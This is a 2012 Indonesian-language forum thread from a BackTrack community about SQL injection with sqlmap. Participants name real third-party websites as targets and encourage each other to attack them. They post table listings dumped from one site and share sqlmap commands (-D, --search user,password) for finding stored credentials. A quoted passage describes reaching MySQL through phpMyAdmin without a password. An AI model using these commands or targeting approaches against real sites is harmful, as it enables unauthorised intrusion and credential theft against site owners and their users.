SQLi Sqlmap.py - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Penetration Testing Os (https://www.indonesianbacktrack.or.id/forum/forum-170.html) +--- Forum: Backtrack (https://www.indonesianbacktrack.or.id/forum/forum-171.html) +---- Forum: BackTrack 5 (https://www.indonesianbacktrack.or.id/forum/forum-74.html) +----- Forum: BackTrack 5 tutorial (https://www.indonesianbacktrack.or.id/forum/forum-82.html) +----- Thread: SQLi Sqlmap.py (/thread-713.html) |
RE: SQLi Sqlmap.py - Junior Riau - 03-23-2012 ohh ane ngerti : Excellent, as we can see mysql server has two users without password. Next step is try to access the database using phpmyadmin (without credentials). Using phpmyadmin web interface, we will try to find mysql’s datadir with the following sql query: pakek phpmyadmin via browser wkwkw pantes ga ada lagi nampak pakek sqlmap mungkin di urlnya dibikin url/phpmyadmin,masih kurang jelas si RE: SQLi Sqlmap.py - fake666 - 03-23-2012 arghh masi belum ngarti == trus waktu kita masukin select @@datadir; /opt/lampp/var/mysql/ itu di terminal ato di web browser ya om?? RE: SQLi Sqlmap.py - Junior Riau - 03-23-2012 web browser,,tapi via php myadmin,,phpmyadmin itu aplikasi webnya dari webserver,,disana sebagai user interfacenya misal buat database buat table,,melakukan query dan sebagainya coba deh install xampp,wamp,lamp salah satu dari 3 itu, ntar jalanin aja ,dbrowser ketik local host(apache2 matikan) kalo ragu g usah aja nanti malah ada error ,,kecuali pengen coba di vbox RE: SQLi Sqlmap.py - fake666 - 03-23-2012 oh gitu ya..ok deh.. eh om ada lagi nih target http://ypc.or.id/?module=Forum&file_id=42 coba deh di liat2 hehe eh yg kemarin ko gak bisa login ya aneh == RE: SQLi Sqlmap.py - Junior Riau - 03-23-2012 itu lah aneh,,wkwkwk okok TKP om RE: SQLi Sqlmap.py - juicided - 03-23-2012 tanya bro, aku udah dapat database: 1. information_schema 2. web9db5 Tabelnya kaya'gini: Database: information_schema [17 tables] +---------------------------------------+ | CHARACTER_SETS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS | | COLUMN_PRIVILEGES | | KEY_COLUMN_USAGE | | PROFILING | | ROUTINES | | SCHEMATA | | SCHEMA_PRIVILEGES | | STATISTICS | | TABLES | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | TRIGGERS | | USER_PRIVILEGES | | VIEWS | +---------------------------------------+ Database: web9db5 [13 tables] +--------------------+ | `-content_backup` | | `-content_uk_back` | | ausschreibungen | | bildserien | | bildserien_uk | | content | | content_fr | | content_nl | | content_uk | | ergebnisse | | fotografen | | inhalttyp | | medien | +--------------------+ lha itu kok nggak ada tabel 'admin' atau 'user' ??, nyariin'nya gimana? tolong dibantu yaa... RE: SQLi Sqlmap.py - fake666 - 03-23-2012 gimana om junior.riau18 bisa gak? ane susah nih,,lelet amat.. RE: SQLi Sqlmap.py - Junior Riau - 03-23-2012 tambahin --search user,pasword jadi sintaknya sqlmap.py -u urltarget, -D namabd --search user,password RE: SQLi Sqlmap.py - juicided - 03-24-2012 nggak ketemu bro. ini site-nya: www.pills-project.eu/index.php?id=138 silahkan di-utek2 ane mau coba target yg laen dulu hehe RE: SQLi Sqlmap.py - Junior Riau - 03-24-2012 site nya aja g punya halaman login om |